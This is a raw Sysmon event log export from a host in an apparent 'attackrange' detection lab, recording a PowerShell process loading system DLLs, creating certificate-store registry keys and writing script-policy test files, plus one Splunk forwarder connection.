17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530186Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530185Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530184Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530183Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530182Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530181Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530180Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530179Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530178Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530177Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530176Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 
12241200x80000000000000001530175Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x80000000000000001530174Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_t1scncc4.xae.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 23542300x80000000000000001530173Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oh243hop.l2p.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 734700x80000000000000001530172Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001530171Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 12241200x80000000000000001530170Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530169Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 734700x80000000000000001530168Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\27b60a7418e19c1fccb099900e2e182a\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5B8A1387F38B3747F281326AE0AE6046,SHA256=72AFDE4C5841503A8DA13C06C8132644F73CE9B49086AF3B3DDBA5F85FA3D3D4false-Unavailable 
734700x80000000000000001530167Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4283 (rs1_release.210303-1802)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=5541A4A7FB64063F8AFB192ABD4DAE70,SHA256=AABF2E6C392F29B77F076BF705976B68B3100138BC63060335BD154B8417754DtrueMicrosoft WindowsValid 734700x80000000000000001530166Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4225 (rs1_release.210127-1811)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=37266F6D0E2F86FD3FC6E4724ED49823,SHA256=8AD484F4A7964D2D87047771BB21D3211F204F87D4EB029C1EFAA4FD935333B1trueMicrosoft WindowsValid 734700x80000000000000001530165Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 734700x80000000000000001530164Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 734700x80000000000000001530163Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 734700x80000000000000001530162Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 13241300x80000000000000001530161Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530160Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530159Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530158Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530157Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530156Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530155Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValid 734700x80000000000000001530154Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4350 (rs1_release.210407-2154)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=D847084F61752DB23D027FFC3CBEF8F7,SHA256=2061D01C7612A6010BDD83E0BB339A1040C8077595AD7A51C9E3ADC4B501B4BFtrueMicrosoft WindowsValid 734700x80000000000000001530153Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\a9817b0436b3d1ea69912071b1772668\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=277A874D3C7FAF514D476913C562779E,SHA256=B0EBBA50E089358BBE363BB14DE6D80AB1F92F52C30C8FE13BC4358C8BB252B1false-Unavailable 734700x80000000000000001530152Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.3986 (rs1_release.201002-1707)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=601EDCF334B3DA561BE85560BFAB4831,SHA256=69422D4F7B2E9673178761052D25718F2F1F1D7D5B0962798ECAC66C123FB207trueMicrosoft WindowsValid 12241200x80000000000000001530151Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530150Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\497f2b8232570a09da6c199ca8afab42\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=1C9EB8C8F79E7AE6D1837A92AEA937C9,SHA256=3FDBD432E9BD0A40D636E64FED0E27AFA7AFE8EC8DFBAF1CEB0E02CF9D45E191false-Unavailable 734700x80000000000000001530149Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\f9f16cefed221a89bd7ccc6559a3e466\System.Management.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Management.dllMD5=A2398F5CDEEC4226380CB620C5D180D8,SHA256=4007C9B8A5360D49CD4DA98D262DA539AD790AA13CA54712757441B1C56F2980false-Unavailable 12241200x80000000000000001530148Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x80000000000000001530147Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x80000000000000001530146Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 
12241200x80000000000000001530145Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530144Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530143Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530142Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530141Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530140Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 11241100x80000000000000001530135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_t1scncc4.xae.psm12021-04-21 17:30:08.516 12241200x80000000000000001530134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 734700x80000000000000001530133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\3641fa87cb8b7dc353a2444b67599334\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET 
FrameworkMicrosoft CorporationSystem.Xml.dllMD5=016FE7AF94AF0BFB824D63F6B0688E43,SHA256=AE20EA6C343733690F1BB9B5963AEA624FFB3B86FAC697FA4C16A753363B291Cfalse-Unavailable 12241200x80000000000000001530132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
734700x80000000000000001530006Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001530005Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000001530004Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\9626a857db364c5cc8c0397184ff6f19\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=8C665AE171663A12BE10948B2BA07B86,SHA256=D552DDF56F054CE073331B359029BFEE76691EDE50C44990CCEEB44490C9F47Bfalse-Unavailable 734700x80000000000000001530003Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\da20d69661026f202acad55611f1f372\System.Core.ni.dll4.8.4330.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=0AA216B359BB985E91C06D6CEC347EF2,SHA256=5EDE9B67C3A3A41FCC240B0D7F27764343BD8C1BB1EAC39F441E00C6E5066C92false-Unavailable 734700x80000000000000001530002Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll4.8.4311.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=D71B052A790A577400CB572A7D4CB69B,SHA256=DE2BE5C6691862A5223BDFEFEE00F33FB6C7A5B2F6DC68124E44EB42D8D3B709false-Unavailable 354300x80000000000000001530001Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:06.751{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64679-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 734700x80000000000000001530000Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\e150e12dedbd1a8eb71660b9680a9ae7\mscorlib.ni.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=CE876D73280DFF17CF3055AB7BFE5C7E,SHA256=CC5303C0076585623C02A29F009104BD8BD4FFBA9E2FB37835289F6A7B98A2EEtrueMicrosoft CorporationValid 
